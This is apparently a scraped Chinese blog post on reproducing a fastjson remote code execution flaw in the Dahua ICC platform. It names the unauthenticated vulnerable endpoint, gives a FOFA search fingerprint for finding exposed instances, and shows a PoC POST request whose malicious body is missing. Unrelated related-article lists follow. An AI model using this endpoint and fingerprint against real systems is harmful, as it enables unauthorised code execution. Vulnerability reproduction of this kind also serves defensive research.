大华智能物联综合管理平台 fastjson远程代码执行漏洞复现

0x01 产品简介

大华ICC智能物联综合管理平台对技术组件进行模块化和松耦合，将解决方案分层分级，提高面向智慧物联的数据接入与生态合作能力。

0x02 漏洞概述

由于大华智能物联综合管理平台使用了存在漏洞的FastJson组件,未经身份验证的攻击者可利用 /evo-runs/v1.0/auths/sysusers/random接口发送恶意的序列化数据执行任意指令，造成代码执行。

0x03 复现环境

FOFA：icon_hash="-1935899595"

0x04 漏洞复现

PoC

POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8

大华智能物联综合管理平台 fastjson远程代码执行漏洞复现

0x01 产品简介

0x02 漏洞概述

0x03 复现环境

0x04 漏洞复现

世邦IP网络对讲广播系统 uploadjson.php接口处存在任意文件上传漏洞

JSON（详解）

大华智能物联综合管理平台 fastjson远程代码执行漏洞复现

CTF题型 nodejs(2) Js沙盒vm&vm2逃逸原理总结&典型例题

jQuery入门到精通学习教程，收藏我这篇就够了_jquery教程(1)

html5知识点：超文本标记语言编程_html可拓展超文本标记语言的页面标记(4)

[HTML]Web前端开发技术6（HTML5、CSS3、JavaScript ）DIV与SPAN，盒模型

零知识证明与同态加密：隐私计算的双剑

解决jquery-1.11.0.js安全漏洞

第28天：安全开发-JS应用&原生开发&JQuery库&Ajax技术&前端后端&安全验证处理

前端哥

解决fixed定位z-index层级无效问题

Node.js毕业设计基于HTML5的互动游戏新闻网站的设计与实现（Express 附源码）

【前端问题集】安卓手机H5页面加粗失效

HTML5(二)——获取用户位置Geolocation，万字解析

html5怎么实现语音搜索

HTML5

HTML - 头部元素

由于一个完整的购物商城代码涉及多个方面（如前端、后端、数据库等），并且每种语言都有其特定的用途和优势，我将为你提供简化的示例代码，分别用前端（HTML/CSS/JavaScript）、后端（Pytho

web前端之引入外部svg文件、html引入.svg文件、等比缩放、解决裁剪、解决若依框架无法使用img选入svg文件问题、命名空间、阿里巴巴尺量图、object标签、embed标签、iframe标签

微信小程序实现带刻度简易仪表盘

1
基于Echarts的高校就业数据可视化管理系统设计与实现（计算机毕业设计源码81461）

2024-05-29 10:05:301000

2
VUE3 Vite Pinia TypeScript项目笔记

2024-05-20 14:05:191000

3
轻松掌握数据库中JSON数据提取：json_extract函数用法详解

2024-05-09 11:05:011000

4
HTML5(六)——Canvas 高级操作

2024-05-09 10:05:191000

5
UE4.27支持HTML5

2024-05-07 13:05:261000

6
前端vue项目使用Decimal.js做加减乘除求余运算

2024-04-23 21:04:401000

7
js数组常用方法（19种）|你会的到底有多少呢？

2024-04-08 11:04:211000

8
jQuery事件处理

2024-03-12 01:03:321000

9
【Echarts系列】—— 实现电池图、3D立体圆形柱状图

2024-03-03 11:03:011000

10
ECharts 饼状图颜色设置

2024-02-16 14:02:001000